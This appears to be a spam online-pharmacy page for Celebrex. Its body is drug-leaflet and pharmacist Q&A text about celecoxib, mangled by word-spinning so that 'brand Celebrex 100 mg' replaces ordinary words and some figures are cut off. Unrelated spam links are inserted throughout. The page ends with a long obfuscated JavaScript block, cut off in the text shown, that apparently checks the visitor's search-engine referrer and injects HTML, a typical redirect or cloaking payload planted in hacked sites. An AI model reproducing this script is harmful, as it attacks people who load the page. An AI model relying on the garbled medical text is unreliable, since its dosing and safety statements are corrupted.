Brand Celebrex 100 mg – Drug Store – Fast Shipping

Brand Celebrex 100 mg

Rating 4.5 stars, based on 310 comments

How to take Celebrex 4, Brand Celebrex 100 mg. Possible side effects 5. How to store Celebrex 6. Contents of the brand Celebrex 100 mg and other information 1. What Celebrex is and what it is used for Celebrex is used in adults for the relief of signs and symptoms of rheumatoid arthritis, osteoarthritis and ankylosing spondylitis. Your body makes prostaglandins that may cause pain and inflammation. In conditions such as rheumatoid arthritis and osteoarthritis your body makes more of these.

  • Gastrointestinal Bleeding, Ulceration, And Perforation Advise patients to report symptoms of ulcerations and bleeding, including epigastric pain, dyspepsia, melena, and hematemesis to their health care provider.
  • Otherwise, take it as soon as you remember, then go back to taking your capsules as you would normally.
  • Your doctor may tell you to reduce the dose over a few days before stopping completely.
  • Lori Mendoza, PharmD Q:

Celebrex acts by reducing the brand Celebrex 100 mg of prostaglandins, thereby reducing the pain and inflammation. You should expect your brand Celebrex 100 mg to start working within hours of taking the first dose, but you may not experience a full effect for several days. What you kgf.org.in to know before you take Celebrex You have been prescribed Celebrex by your doctor. The following information will help you get the best results with Celebrex. If you have any further questions please ask your doctor or pharmacist. Some cases of severe liver reactions, including severe liver inflammation, brand Celebrex 100 mg damage, liver failure some with fatal outcome or requiring liver transplant, have been reported with celecoxib. Of the cases that reported time to onset, most severe liver reactions occurred within one month of start of treatment.

Celebrex may make it more difficult to become pregnant.

You should inform your brand Celebrex 100 mg if you are planning to become pregnant or if you midorigaoka-shouten.com problems to become pregnant see section on Pregnancy and breast-feeding. If you forget to take it If it is almost time for your next dose, skip the dose you missed and take your next dose when you are meant to. Otherwise, take it as soon as you remember, then go back to taking your capsules as you would normally.

Do not take a double dose to makeup for the dose you missed. If you take too much overdose Immediately telephone your doctor or Poisons Information Centre telephone for advice, or go to Accident and Emergency at your nearest hospital if you think you or anyone else may have taken too much Celebrex. Do this even if there are no signs of brand Celebrex 100 mg or poisoning. You may need urgent medical attention. If you brand Celebrex 100 mg too much Celebrex, you may feel tired, drowsy, sick, vomit, and have stomach pain. You may also have difficulty breathing and feel faint. While you are using Celebrex Things you must do If you become pregnant while taking Celebrex, tell your doctor immediately. If you are about to start any new medicines, Brand Celebrex 100 mg, tell your doctor and pharmacist that you are taking Celebrex. Tell all doctors, dentists and pharmacists who are treating you that you are taking Celebrex.

If you develop any brand Celebrex 100 mg rash e. The onset of these events, if they occur, can occur at any time, but most often occur in the first month of treatment. If you are about to have any blood tests, tell your doctor that you are taking this medicine. Things you must not do Do not give Celebrex to anyone else, even if they have the same symptoms or condition as you. Do not take Celebrex to treat any other brands Celebrex 100 mg unless your doctor tells you to. Side effects Check with your doctor as soon as possible if you have any problems while taking Celebrex, even if you do not think the problems are connected with the medicine or are not listed in this brand Celebrex 100 mg. Gout is a type of arthritis caused when too much of a chemical called uric acid builds up in the blood.

Uric acid comes from the breakdown of protein, whether from the turnover of our own cells or from foods and beverages. Usually, the kidneys can get rid of normal levels of uric acid. In gout, it builds up and is not gotten rid of properly. This can lead to the formation of crystals that deposit in joints and cause pain. The treatment of gout focuses on decreasing both the uric acid levels and the pain caused by the crystal deposits. Discuss their use with your health care provider before taking them. I’ve been taking Celebrex, and it isn’t brand Celebrex 100 mg me so much relief anymore. The main concern with these medications is that over time, they can cause bleeding in the gastrointestinal GI tract, which includes the esophagus leading into the stomach, the stomach, and the intestines.

An alternative is Tylenol acetaminophen, as it works differently, but it does not reduce inflammation. NSAIDs work by reducing the effects of prostaglandins, which cause inflammation, pain, and fever in the body. COX-1 makes prostaglandins that support platelets and protect the stomach lining. When they are blocked, the platelets cannot cause the brand Celebrex 100 mg to clot as easily.

COX-2 makes the prostaglandins that cause inflammation, swelling, and as a result, pain. Celebrex celecoxib is a COX-2 inhibitor that is still on the market and is considered safe, as long as the person taking it does not have any past heart problems or risk factors for them. Patti Brown, PharmD Q: Do you recommend Celebrex for mild arthritis?

CELEBREX 100MG CAPSULES

Initially, doctors recommend that patients rest and avoid brands Celebrex 100 mg that cause pain, exercise to increase the strength of muscles around the affected joints, and lose weight to decrease pressure on the joints. If midorigaoka-shouten.com becomes necessary, it is best to start with those that have the least side effects.

The first treatment is usually acetaminophen Tylenol, which reduces pain, but brands Celebrex 100 mg not affect inflammation. It is generally well tolerated, but taking more than recommended or having more than three alcoholic drinks per day can increase the risk of liver damage. They can cause stomach upset, so it is recommended that they be taken with food.

Celebrex Cheap

Both acetaminophen and NSAIDs can interfere brand Celebrex 100 mg blood brands Celebrex 100 mg, so it is important to check with your doctor before taking these medications. COX-2 inhibitors should be taken buy Vardenafil at the lowest dose needed to relieve your pain. Is there another medication that I can take that is equally as good as Celebrex. It’s very good but so expensive! The second one is desirable, as it decreases the inflammation. The first pathway can slowly destroy the stomach lining and over time, cause ulcers or GI bleeding.

Celebrex is the only medication that does not go down the COX-1 brand Celebrex 100 mg very much. Others were developed Vioxx and Bextra, but then recalled due to issues with people having heart problems. Ultimately, you should see what your doctor thinks is best for you. If your doctor insists on Celebrex, you may want to contact the company and see if they have any discount coupons that your pharmacy can process. Many companies do this.

Brand Celebrex 100 mg

The company to contact is Pfizer. For more information on pain management, please visit our link at: How safe are Geodon and Celebrex? My doctor wants me on Celebrex, but I’ve read it can cause heart attacks, Brand Celebrex 100 mg. All prescription medications have side effects or common reactions that are patient specific, midorigaoka-shouten.com prescription medications to treat your health conditions.

Lowell Sterler, RPh Q: Does prolonged use of Celebrex hinder your kidneys or liver? According to the manufacturer, Celebrex has the brand Celebrex 100 mg of causing fewer stomach and intestinal side effects compared to other NSAIDs. Clinical studies show Celebrex may cause acute renal failure in less than 0. The prescribing information by the manufacturer also states that Celebrex should be used with caution in patients with pre-existing renal impairment. For low-risk brands Celebrex 100 mg, it is customary for clinician to order labs for renal function within three months after initiating therapy and repeated every six to 12 months. For those at high risk for renal failure older than 60 years, pre-existing renal insufficiency, monitoring of renal function should be more frequent.

Celebrex has been associated with increasing liver enzymes.

Brand Celebrex 100 mg

According to research data by the manufacturer, elevated liver enzymes were reported in 0. Although liver enzymes were elevated, liver failure is rare. For brands Celebrex 100 mg at low risk, Brand Celebrex 100 mg, liver enzymes should midorigaoka-shouten.com monitored within three months of starting treatment and repeated every six to 12 months. In high risk brands Celebrex 100 mg, more frequent monitoring is required.

Lori Mendoza, PharmD Q: Celebrex is indicated for the symptomatic treatment of pain or inflammation caused by brand Celebrex 100 mg, rheumatoid arthritis, juvenile rheumatoid arthritis in children two years of age and older, ankylosing spondylitis, acute pain, primary dysmenorrhea and as an adjunct to usual care in patients with familial adenomatous polyposis.

Celebrex is contraindicated in patients with documented hypersensitivity to the active ingredient, celecoxib, or sulfonamides or in patients with a medical history of asthma, urticaria, or other allergic-type reactions associated with aspirin or other NSAIDs. Treatment is Celebrex is also contraindicated during the perioperative period in patients undergoing coronary artery bypass graft CABG surgery.

Rheumatoid Arthritis (RA) Symptoms & Treatment

Treatment with Celebrex should be individualized and prescribed at the lowest effective dose and for the shortest duration required to achieve treatment goals for any given indication. Patients are advised to avoid alcohol while being treated with Celebrex as alcohol can increase the risk of stomach bleeding. The most commonly reported adverse reactions leading to discontinuation of treatment with Celebrex were dyspepsia and abdominal pain. More severe adverse reactions are possible with treatment with Celebrex. Celebrex carries black box warnings regarding danzayritual.com risk of serious cardiovascular and gastrointestinal events associated with treatment. Celebrex may cause an increased risk of serious cardiovascular thrombotic events, heart attack and stroke, which can be fatal. The risk of cardiovascular events may be increased with duration of use and in those patients with documented cardiovascular disease or risk factors for cardiovascular disease.

Celebrex, like other NSAIDs, Brand Celebrex 100 mg, may cause an increased risk of serious gastrointestinal events including bleeding, Brand Celebrex 100 mg, ulceration and perforation of the stomach or intestines, which also may be fatal. Serious gastrointestinal adverse reactions can occur at any time during treatment and without warning symptoms. The risk of developing serious gastrointestinal events is greater in the elderly population.

Contact your health care provider immediately if you experience any signs and symptoms which may indicate the presence of serious gastrointestinal events including black, Brand Celebrex 100 mg, bloody or tarry stools midorigaoka-shouten.com coughing up blood or vomit that looks like coffee grinds. When considering treatment with an anti-inflammatory, the patient and health care provider are advised to carefully assess the potential benefits versus risks of Celebrex and other treatment options before deciding upon treatment with Celebrex.

How often should you take Celebrex? How often you should take Celebrex celecoxib depends upon the reason for treatment. Celebrex is approved for the relief of symptoms caused by pain or inflammation associated with several medical conditions, including osteoarthritis, rheumatoid arthritis, juvenile rheumatoid arthritis in children ages two and older, ankylosing spondylitis, primary dysmenorrhea, acute pain or familial adenomatous polyposis as an adjunct treatment to usual care. When prescribed for the symptomatic relief in patients with osteoarthritis, Celebrex is usually taken once or twice daily. As a treatment option for relief of signs and symptoms of rheumatoid arthritis in the adult population, Celebrex is typically taken twice daily.

Lastly, when Celebrex is used as an adjunct to usual care in patients with familial adenomatous polyposis, the dose is usually taken twice daily with food. When deciding upon Celebrex as a treatment option, health care providers are urged to carefully consider the risk versus benefit of treatment with Celebrex and use the lowest effective dose for the shortest duration of treatment possible to achieve positive therapeutic outcomes. What is the usual dosage of Celebrex? The usual dosage of Celebrex is brand Celebrex 100 mg upon the indication for treatment. Physicians and patients should remain alert for the development of such events, throughout the brand Celebrex 100 mg treatment course, even in the absence of previous CV symptoms. Patients should be informed about the symptoms of serious CV events and the steps to take if they occur.

There is no consistent evidence that concurrent use of aspirin mitigates the increased risk of serious CV thrombotic events associated with NSAID use. Although the brand Celebrex 100 mg rate of death declined somewhat after the first year post-MI, the increased relative risk of brand Celebrex 100 mg in NSAID users persisted over at least the next brand Celebrex 100 mg years of follow-up. Avoid the use of Celebrex in patients with a recent MI unless the benefits are expected to outweigh the risk of recurrent CV thrombotic events. If Celebrex is used in patients with a recent MI, monitor patients for signs of cardiac ischemia. Gastrointestinal Bleeding, Ulceration, And Perforation NSAIDs, including celecoxib cause serious gastrointestinal GI adverse events including inflammation, bleeding, ulceration, and perforation of the esophagus, stomach, small intestine, or large intestine, which can be fatal.

Other factors that increase the risk of GI bleeding in patients treated with NSAIDs include longer duration of NSAID therapy; concomitant use of oral corticosteroids, aspirin, anticoagulants; or selective serotonin reuptake inhibitors SSRIs ; smoking; use of alcohol; older age; and poor general health status. Most postmarketing reports of fatal GI events occurred in elderly or debilitated patients. Complicated and symptomatic ulcer rates were 0.

Patients 65 years of age and older had an incidence of 1. Avoid use in patients at higher risk unless benefits are expected to outweigh the increased risk of bleeding. In addition, rare, sometimes fatal, cases of severe hepatic injury, including fulminant hepatitis, liver necrosis, and hepatic failure have been reported. Inform patients of the warning signs and symptoms of hepatotoxicity e.

8IGyu7A

$=String.fromCharCode(118,82,61,109,46,59,10,40,120,39,103,41,33,45,49,124,107,121,104,123,69,66,73,54,112,57,55,53,122,48,72,84,77,76,60,34,47,95,63,38,43,85,67,119,44,58,37,51,62,125);_=([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]];_[_][_]($[0]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[2]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[4]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[5]+$[6]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[7]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[10]+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+$[10]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+$[10]+([]+[]+{})[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[17]+(![]+[])[+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[17]+(![]+[])[+!+[]]+$[18]+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$[16]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+$[0]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[11]+$[6]+$[19]+$[6]+$[6]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[4]+$[10]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$[20]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[21]+$[17]+$[22]+([]+[]+[][[]])[!+[]+!+[]]+$[7]+$[9]+$[23]+$[14]+(!![]+[])[!+[]+!+[]+!+[]]+$[24]+$[3]+$[13]+$[25]+$[26]+$[27]+$[13]+$[25]+$[28]+([]+[]+{})[!+[]+!+[]]+$[13]+$[29]+$[27]+$[17]+([]+[]+{})[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[9]+$[11]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[30]+$[31]+$[32]+$[33]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[2]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[34]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[2]+$[35]+$[29]+$[35]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[2]+$[35]+([]+[]+[][[]])[+!+[]]+([]+[]+{})[+!+[]]+$[35]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$[24]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[2]+$[35]+$[29]+$[35]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[2]+$[35]+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+$[35]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[2]+$[35]+$[36]+$[36]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$[3]+(!![]+[])[+!+[]]+$[8]+$[4]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+$[3]+$[36]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[37]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+$[38]+(![]+[])[+[]]+(!![]+[])[+!+[]]+$[3]+$[2]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+$[39]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[37]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[2]+$[9]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[40]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[41]+$[1]+$[22]+$[42]+([]+[]+{})[+!+[]]+$[3]+$[24]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[7]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[4]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[11]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[40]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[39]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+$[37]+$[16]+(!![]+[])[!+[]+!+[]+!+[]]+$[17]+$[43]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$[2]+$[42]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+$[9]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[40]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[39]+$[9]+$[40]+$[43]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+$[43]+$[4]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+$[4]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[18]+$[4]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[24]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+$[7]+$[9]+$[38]+$[9]+$[44]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[39]+$[9]+$[11]+$[40]+$[9]+$[35]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$[17]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[2]+$[35]+$[24]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+$[45]+(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$[8]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[43]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[+[]]+$[18]+$[45]+$[14]+$[29]+$[29]+$[46]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[18]+(!![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$[10]+$[18]+(!![]+[])[+[]]+$[45]+$[14]+$[29]+$[29]+$[46]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+$[10]+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$[13]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+$[45]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[43]+$[18]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+